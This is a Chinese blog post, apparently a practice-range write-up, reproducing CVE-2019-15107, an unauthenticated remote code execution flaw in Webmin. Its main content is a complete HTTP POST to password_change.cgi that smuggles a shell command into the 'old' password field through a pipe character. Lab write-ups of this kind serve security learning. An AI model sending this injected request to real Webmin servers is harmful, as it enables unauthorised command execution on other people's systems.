当前位置:网站首页>墨者学院-Webmin未经身份验证的远程代码执行
墨者学院-Webmin未经身份验证的远程代码执行
2022-07-04 07:40:00 【Lyswbb】
首先拿到靶场后进行访问,访问后来到一个登陆页面
根据题目可知,未授权的rce,所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication
burp抓取流量包,然后修改参数,注意需要把session_login.cgi改成password_change.cgi,下面的参数直接复制就行,这个漏洞点的触发只需要传一个expired参数执行命令即可
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
直接查询根下的key.txt即可
边栏推荐
- Activiti常見操作數據錶關系
- L1-027 rental (20 points)
- Take you to master the formatter of visual studio code
- How to use MOS tube to realize the anti reverse connection circuit of power supply
- win10微软拼音输入法输入文字时候下方不出现中文提示
- Chain ide -- the infrastructure of the metauniverse
- I was pressed for the draft, so let's talk about how long links can be as efficient as short links in the development of mobile terminals
- The IP bound to the socket is inaddr_ The meaning of any htonl (inaddr_any) (0.0.0.0 all addresses, uncertain addresses, arbitrary addresses)
- 果果带你写链表,小学生看了都说好
- Life planning (flag)
猜你喜欢
Write a thread pool by hand, and take you to learn the implementation principle of ThreadPoolExecutor thread pool
Rhcsa the next day
JVM -- class loading process and runtime data area
System architecture design of circle of friends
A real penetration test
Used on windows Bat file startup project
![[network security] what is emergency response? What indicators should you pay attention to in emergency response?](/img/2e/96da79d82ae2c49a3a0ab9909467ac.jpg)
[network security] what is emergency response? What indicators should you pay attention to in emergency response?
SQL注入测试工具之Sqli-labs下载安装重置数据库报错解决办法之一(#0{main}thrown in D:\Software\phpstudy_pro\WWW\sqli-labs-……)
![[Flink] temporal semantics and watermark](/img/4d/cf9c7e80ea416155cee62cdec8a5bb.jpg)
[Flink] temporal semantics and watermark
Text processing function sorting in mysql, quick search of collection
随机推荐
OKR vs. KPI figure out these two concepts at once!
Oracle-存储过程与函数
Pangu open source: multi support and promotion, the wave of chip industry
Docker install MySQL
Would you like to go? Go! Don't hesitate if you like it
Literature collation and thesis reading methods
Activiti常见操作数据表关系
深入浅出:了解时序数据库 InfluxDB
Types of references in BibTex
University stage summary
Linear algebra 1.1
MYCAT middleware installation and use
With excellent strength, wangchain technology, together with IBM and Huawei, has entered the annual contribution list of "super ledger"!
[C language] open the door of C
L1-028 judging prime number (10 points)
MySQL中的文本处理函数整理,收藏速查
提升复杂场景三维重建精度 | 基于PaddleSeg分割无人机遥感影像
The idea of implementing charts chart view in all swiftui versions (1.0-4.0) was born
Leetcode(215)——数组中的第K个最大元素
MySQL 数据库 - 函数 约束 多表查询 事务